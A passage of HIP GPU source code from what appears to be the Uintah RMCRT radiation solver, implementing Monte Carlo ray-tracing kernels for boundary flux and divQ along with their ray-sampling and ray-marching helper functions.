dirSignSwap[BOT] = make_int3( 1, 1, 1); __syncthreads(); //__________________________________ // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } boundFlux[origin].initialize(0.0); BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux[origin].p = has_a_boundaryDevice(origin, cellType, boundaryFaces); GPUPoint CC_pos = level.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, 
direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else { rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, patch.dx, CC_pos, rayOrigin); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a // half range of the solid angle (Modest Radiative Heat Transfer page 545 1st edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux[origin][ face ] = sumProjI * 2 *M_PI/(double)nFluxRays; #if ( DEBUG == 2 ) if( isDbgCellDevice(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux[origin][ face ]); } #endif } // boundary faces loop } // z slices loop } // X-Y Thread loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ //Setup the original seeds so we can get the same random numbers again. setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveDivQ ){ const int nDivQRays = RT_flags.nDivQRays; // for readability // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //Get the same set of random numbers as we had before. We need the same rays. if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } double sumI = 0; GPUPoint CC_pos = level.getCellPosition(origin); // don't compute in intrusions and walls if( cellType[origin] != d_flowCell ){ continue; } //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < nDivQRays; iRay++) { GPUVector direction_vector; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling direction_vector = findRayDirectionHyperCubeDevice(randNumStates, nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling direction_vector = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, patch.dx, RT_flags.CCRays ); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ[origin] = -4.0 * M_PI * abskg[origin] * ( sigmaT4OverPi[origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. 
Shaddix) are used radiationVolQ[origin] = 4.0 * M_PI * abskg[origin] * (sumI/RT_flags.nDivQRays) ; #if ( DEBUG == 1) if( isDbgCellDevice( origin ) ){ printf( "\n [%d, %d, %d] sumI: %1.16e divQ: %1.16e radiationVolq: %1.16e abskg: %1.16e, sigmaT4: %1.16e \n", origin.x, origin.y, origin.z, sumI,divQ[origin], radiationVolQ[origin],abskg[origin], sigmaT4OverPi[origin]); } #endif } // end z-slice loop } // end domain boundary check } // solve divQ } // end ray trace kernel //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer data onion kernel //--------------------------------------------------------------------------- // hard-wired for 2-levels now, but this should be fast and fixes __constant__ levelParams d_levels[d_MAXLEVELS]; template< class T> __global__ #if NDEBUG //Uinth has a DNDEBUG compiler defined flag in normal trunk builds. Debug builds have no compiler flags we can capture. __launch_bounds__(640, 1) // For 96 registers with 320 threads. Allows two kernels to fit within an SM. // Seems to be the performance sweet spot in release mode. #endif void rayTraceDataOnionKernel( dim3 dimGrid, dim3 dimBlock, int matl, patchParams finePatch, gridParams gridP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, int3* regionLo, int3* regionHi, hiprandState_t* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { #if 0 if (tidX == 1 && tidY == 1) { printf("\nGPU levelParams\n"); printf("Level-0 "); d_levels[0].print(); printf("Level-1 "); d_levels[1].print(); } #endif int maxLevels = gridP.maxLevels; int fineL = maxLevels - 1; levelParams fineLevel = d_levels[fineL]; //compute startCell and endCell relative to the block int startCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * blockIdx.x; int endCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * (blockIdx.x + 1); RT_flags.startCell = startCell; RT_flags.endCell = endCell; //__________________________________ // const GPUGridVariable<T> abskg[d_MAXLEVELS]; const GPUGridVariable<T> sigmaT4OverPi[d_MAXLEVELS]; const GPUGridVariable<int> cellType[d_MAXLEVELS]; // new_gdw->print(); //__________________________________ // coarse level data for the entire level for (int l = 0; l < maxLevels; ++l) { if (d_levels[l].hasFinerLevel) { if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg[l], "abskgRMCRT", matl, l); } else { abskg_gdw->getLevel( abskg[l], "abskg", matl, l); } sigmaT4_gdw->getLevel( sigmaT4OverPi[l], "sigmaT4", matl, l); cellType_gdw->getLevel( cellType[l], "cellType", matl, l); GPUVariableSanityCK(abskg[l], d_levels[l].regionLo,d_levels[l].regionHi); GPUVariableSanityCK(sigmaT4OverPi[l],d_levels[l].regionLo,d_levels[l].regionHi); } } //__________________________________ // fine level data for the region of interest. 
// ToDo: replace get with getRegion() calls so // so the halo can be > 0 if ( RT_flags.whichROI_algo == patch_based ) { if(RT_flags.usingFloats){ abskg_gdw->get(abskg[fineL], "abskgRMCRT", finePatch.ID, matl, fineL); } else { abskg_gdw->get(abskg[fineL], "abskg", finePatch.ID, matl, fineL); } sigmaT4_gdw->get(sigmaT4OverPi[fineL], "sigmaT4", finePatch.ID, matl, fineL); cellType_gdw->get(cellType[fineL], "cellType", finePatch.ID, matl, fineL); GPUVariableSanityCK(abskg[fineL], fineLevel_ROI_Lo,fineLevel_ROI_Hi); GPUVariableSanityCK(sigmaT4OverPi[fineL],fineLevel_ROI_Lo,fineLevel_ROI_Hi); } GPUGridVariable<double> divQ_fine; GPUGridVariable<GPUStencil7> boundFlux_fine; GPUGridVariable<double> radiationVolQ_fine; //__________________________________ // fine level data for this patch if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ_fine, "divQ", finePatch.ID, matl, fineL ); new_gdw->getModifiable( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->getModifiable( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); }else{ new_gdw->get( divQ_fine, "divQ", finePatch.ID, matl, fineL ); // these should be allocateAndPut() calls new_gdw->get( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->get( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); //__________________________________ // initialize Extra Cell Loop int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector c = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { divQ_fine[c] = 0.0; radiationVolQ_fine[c] = 0.0; boundFlux_fine[c].initialize(0.0); //move to the next cell threadID += blockDim.x; c.x = (threadID % finePatchSize.x) + finePatch.lo.x; c.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; c.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } } //We're going to change thread to cell mappings, so make sure all vars have been initialized before continuing __syncthreads(); //__________________________________ // bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme //const int size = 500; int rand_i[ d_MAX_RAYS ]; //Give it a buffer room for many rays. //Hopefully this 500 will always be greater than the number of rays. //TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) if (nFluxRays > d_MAX_RAYS || RT_flags.nDivQRays > d_MAX_RAYS) { printf("\n\n\nERROR! rayTraceDataOnionKernel() - Cannot have more rays than the rand_i array size. Flux rays: %d, divQ rays: %d, size of the array is %d\n\n\n", nFluxRays, RT_flags.nDivQRays, d_MAX_RAYS); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values.
return; } setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), finePatch.ID, curTimeStep); //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ if( RT_flags.solveBoundaryFlux ){ int3 dirIndexOrder[6]; int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } if (cellType[fineL][origin] == d_flowCell) { // don't solve for fluxes in intrusions boundFlux_fine[origin].initialize(0.0); //FIXME: Already initialized? 
BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux_fine[origin].p = has_a_boundaryDevice(origin, cellType[fineL], boundaryFaces); GPUPoint CC_pos = fineLevel.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else{ // Naive Monte-Carlo sampling rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, finePatch.dx, CC_pos, rayOrigin); updateSumI_MLDevice<T>( direction_vector, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) RT_flags.nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a half range of the solid angle (Modest Radiative Heat Transfer page 545 1rst edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux_fine[origin][ face ] = sumProjI * 2 *M_PI/ (double) RT_flags.nFluxRays; //==========TESTING========== #if (DEBUG == 2) if( isDbgCell(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux_fine[origin][ face ] ); } #endif //===========TESTING========== } // boundary faces loop } //end if checking for intrusions //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } // while loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ if( RT_flags.solveDivQ ) { // GPU equivalent of GridIterator loop - calculate sets of rays per thread int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { // don't compute in intrusions and walls if(cellType[fineL][origin] != d_flowCell ){ continue; } GPUPoint CC_pos = 
d_levels[fineL].getCellPosition(origin); #if( DEBUG == 1 ) if( isDbgCellDevice( origin ) ){ printf(" origin[%i,%i,%i] finePatchID: %i \n", origin.x, origin.y, origin.z, finePatch.ID); } #endif double sumI = 0; //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < RT_flags.nDivQRays; iRay++) { GPUVector ray_direction; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling ray_direction = findRayDirectionHyperCubeDevice(randNumStates, RT_flags.nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling ray_direction = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, d_levels[fineL].Dx , RT_flags.CCRays ); updateSumI_MLDevice<T>(ray_direction, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ_fine[origin] = -4.0 * M_PI * abskg[fineL][origin] * ( sigmaT4OverPi[fineL][origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. Shaddix) are used radiationVolQ_fine[origin] = 4.0 * M_PI * (sumI/RT_flags.nDivQRays); #if (DEBUG == 1) if( isDbgCellDevice(origin) ){ printf( "\n [%d, %d, %d] sumI: %g divQ: %g radiationVolq: %g abskg: %g, sigmaT4: %g \n", origin.x, origin.y, origin.z, sumI,divQ_fine[origin], radiationVolQ_fine[origin],abskg[fineL][origin], sigmaT4OverPi[fineL][origin]); } #endif //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; //printf("Got [%d,%d,%d] from %d on counter %d\n", origin.x, origin.y, origin.z, threadID, cellCounter); } // end while loop } // solve divQ } //______________________________________________________________________ // //______________________________________________________________________ __device__ GPUVector findRayDirectionDevice( hiprandState_t* randNumStates ) { // Random Points On Sphere // add fuzz to prevent infs in 1/dirVector calculation double plusMinus_one = 2.0 * randDblExcDevice( randNumStates ) - 1.0 + DBL_EPSILON; double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Radius of circle at z double theta = 2.0 * M_PI * randDblExcDevice( randNumStates ); // Uniform betwen 0-2Pi GPUVector dirVector; dirVector.x = r*cos(theta); // Convert to cartesian coordinates dirVector.y = r*sin(theta); dirVector.z = plusMinus_one; #if ( FIXED_RAY_DIR == 1) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.) * SIGN; #elif ( FIXED_RAY_DIR == 2 ) dirVector = make_double3(0.707106781186548, 0.0, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 3 ) dirVector = make_double3(0.0, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 4 ) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 5 ) dirVector = make_double3(1, 0, 0) * SIGN; #elif ( FIXED_RAY_DIR == 6 ) dirVector = make_double3(0, 1, 0) * SIGN; #elif ( FIXED_RAY_DIR == 7 ) dirVector = make_double3(0, 0, 1) * SIGN; #else #endif return dirVector; } //______________________________________________________________________ // Uses stochastically selected regions in polar and azimuthal space to // generate the Monte-Carlo directions. 
Samples Uniformly on a hemisphere // and as hence does not include the cosine in the sample. //______________________________________________________________________ __device__ void rayDirectionHyperCube_cellFaceDevice(hiprandState_t* randNumStates, const GPUIntVector& origin, const int3& indexOrder, const int3& signOrder, const int iRay, GPUVector& dirVector, double& cosTheta, const int bin_i, const int bin_j, const int nFluxRays) { // randomly sample within each randomly selected region (may not be needed, alternatively choose center of subregion) cosTheta = (randDblExcDevice(randNumStates) + (double) bin_i)/(double)nFluxRays; double theta = acos(cosTheta); // polar angle for the hemisphere double phi = 2.0 * M_PI * (randDblExcDevice(randNumStates) + (double) bin_j)/(double)nFluxRays; // Uniform betwen 0-2Pi cosTheta = cos(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sin(theta) * cos(phi); tmp[1] = sin(theta) * sin(phi); tmp[2] = cosTheta; //Put direction vector as coming from correct face, dirVector[0] = tmp[indexOrder.x] * signOrder.x; dirVector[1] = tmp[indexOrder.y] * signOrder.y; dirVector[2] = tmp[indexOrder.z] * signOrder.z; } //______________________________________________________________________ // __device__ GPUVector findRayDirectionHyperCubeDevice(hiprandState_t* randNumStates, const int nDivQRays, const int bin_i, const int bin_j) { // Random Points On Sphere double plusMinus_one = 2.0 *(randDblExcDevice( randNumStates ) + (double) bin_i)/nDivQRays - 1.0; // Radius of circle at z double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Uniform betwen 0-2Pi double phi = 2.0 * M_PI * (randDblExcDevice( randNumStates ) + (double) bin_j)/nDivQRays; GPUVector dirVector; dirVector[0] = r*cos(phi); // Convert to cartesian dirVector[1] = r*sin(phi); dirVector[2] = plusMinus_one; return dirVector; } //______________________________________________________________________ // Populate vector with integers which have been randomly shuffled. // This is sampling without replacement and can be used to in a // Latin-Hyper-Cube sampling scheme. The algorithm used is the // modern Fisher-Yates shuffle. //______________________________________________________________________ __device__ void randVectorDevice( int int_array[], const int size, hiprandState_t* randNumStates ){ for (int i=0; i<size; i++){ // populate sequential array from 0 to size-1 int_array[i] = i; } for (int i=size-1; i>0; i--){ // fisher-yates shuffle starting with size-1 int rand_int = randIntDevice(randNumStates, i); // Random number between 0 & i int swap = int_array[i]; int_array[i] = int_array[rand_int]; int_array[rand_int] = swap; } } //______________________________________________________________________ // Compute the Ray direction from a cell face __device__ void rayDirection_cellFaceDevice( hiprandState_t* randNumStates, const GPUIntVector& origin, const GPUIntVector& indexOrder, const GPUIntVector& signOrder, const int iRay, GPUVector& directionVector, double& cosTheta ) { // Surface Way to generate a ray direction from the positive z face double phi = 2 * M_PI * randDblDevice(randNumStates); // azimuthal angle. 
Range of 0 to 2pi double theta = acos(randDblDevice(randNumStates)); // polar angle for the hemisphere cosTheta = cos(theta); double sinTheta = sin(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sinTheta * cos(phi); tmp[1] = sinTheta * sin(phi); tmp[2] = cosTheta; // Put direction vector as coming from correct face, directionVector[0] = tmp[indexOrder[0]] * signOrder[0]; directionVector[1] = tmp[indexOrder[1]] * signOrder[1]; directionVector[2] = tmp[indexOrder[2]] * signOrder[2]; } //______________________________________________________________________ // Compute the physical location of a ray's origin __device__ GPUVector rayOriginDevice( hiprandState_t* randNumStates, const GPUPoint CC_pos, const GPUVector dx, const bool useCCRays) { GPUVector rayOrigin; if( useCCRays == false ){ rayOrigin[0] = CC_pos.x - 0.5*dx.x + randDblDevice(randNumStates) * dx.x; rayOrigin[1] = CC_pos.y - 0.5*dx.y + randDblDevice(randNumStates) * dx.y; rayOrigin[2] = CC_pos.z - 0.5*dx.z + randDblDevice(randNumStates) * dx.z; }else{ rayOrigin[0] = CC_pos.x; rayOrigin[1] = CC_pos.y; rayOrigin[2] = CC_pos.z; } return rayOrigin; } //______________________________________________________________________ // Compute the Ray location from a cell face __device__ void rayLocation_cellFaceDevice( hiprandState_t* randNumStates, const GPUIntVector& origin, const GPUIntVector &indexOrder, const GPUIntVector &shift, const double &DyDx, const double &DzDx, GPUVector& location ) { GPUVector tmp; tmp[0] = randDblDevice(randNumStates); tmp[1] = 0; tmp[2] = randDblDevice(randNumStates) * DzDx; // Put point on correct face location[0] = tmp[indexOrder[0]] + (double)shift[0]; location[1] = tmp[indexOrder[1]] + (double)shift[1] * DyDx; location[2] = tmp[indexOrder[2]] + (double)shift[2] * DzDx; location[0] += (double)origin.x; location[1] += (double)origin.y; location[2] += (double)origin.z; } //______________________________________________________________________ // // Compute the Ray location on a cell face __device__ void rayLocation_cellFaceDevice( hiprandState_t* randNumStates, const int face, const GPUVector Dx, const GPUPoint CC_pos, GPUVector& rayOrigin) { double cellOrigin[3]; // left, bottom, back corner of the cell cellOrigin[X] = CC_pos.x - 0.5 * Dx[X]; cellOrigin[Y] = CC_pos.y - 0.5 * Dx[Y]; cellOrigin[Z] = CC_pos.z - 0.5 * Dx[Z]; switch(face) { case WEST: rayOrigin[X] = cellOrigin[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case EAST: rayOrigin[X] = cellOrigin[X] + Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case SOUTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case NORTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case BOT: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z]; break; case TOP: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + Dx[Z]; break; default: // throw 
InternalError("Ray::rayLocation_cellFace, Invalid FaceType Specified", __FILE__, __LINE__); return; } } //______________________________________________________________________ // __device__ bool has_a_boundaryDevice(const GPUIntVector &c, const GPUGridVariable<int>& celltype, BoundaryFaces &boundaryFaces){ GPUIntVector adj = c; bool hasBoundary = false; adj[0] = c[0] - 1; // west if ( celltype[adj]+1 ){ // cell type of flow is -1, so when cellType+1 isn't false, we boundaryFaces.addFace( WEST ); // know we're at a boundary hasBoundary = true; } adj[0] += 2; // east if ( celltype[adj]+1 ){ boundaryFaces.addFace( EAST ); hasBoundary = true; } adj[0] -= 1; adj[1] = c[1] - 1; // south if ( celltype[adj]+1 ){ boundaryFaces.addFace( SOUTH ); hasBoundary = true; } adj[1] += 2; // north if ( celltype[adj]+1 ){ boundaryFaces.addFace( NORTH ); hasBoundary = true; } adj[1] -= 1; adj[2] = c[2] - 1; // bottom if ( celltype[adj]+1 ){ boundaryFaces.addFace( BOT ); hasBoundary = true; } adj[2] += 2; // top if ( celltype[adj]+1 ){ boundaryFaces.addFace( TOP ); hasBoundary = true; } return (hasBoundary); } //______________________________________________________________________ // //______________________________________________________________________ __device__ void raySignStepDevice(GPUVector& sign, int cellStep[], const GPUVector& inv_direction_vector) { // get new step and sign for ( int d=0; d<3; d++){ double me = copysign((double)1.0, inv_direction_vector[d]); // +- 1 sign[d] = fmax(0.0, me); // 0, 1 cellStep[d] = int(me); } } //______________________________________________________________________ // __device__ bool containsCellDevice( GPUIntVector low, GPUIntVector high, GPUIntVector cell, const int dir) { return low[dir] <= cell[dir] && high[dir] > cell[dir]; } //______________________________________________________________________ // // used by dataOnion it will be replaced __device__ void reflect(double& fs, GPUIntVector& cur, GPUIntVector& prevCell, const double abskg, bool& in_domain, int& step, double& sign, double& ray_direction) { fs = fs * (1 - abskg); //put cur back inside the domain cur = prevCell; in_domain = true; // apply reflection condition step *= -1; // begin stepping in opposite direction sign *= -1; ray_direction *= -1; } //______________________________________________________________________ template< class T > __device__ void updateSumIDevice ( levelParams level, GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, const GPUVector& Dx, const GPUGridVariable< T >& sigmaT4OverPi, const GPUGridVariable< T >& abskg, const GPUGridVariable<int>& celltype, double& sumI, hiprandState_t* randNumStates, RMCRT_flags RT_flags) { GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; // is 0 for negative ray direction GPUVector inv_ray_direction = 1.0/ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, ray_direction); GPUPoint CC_pos = level.getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( 
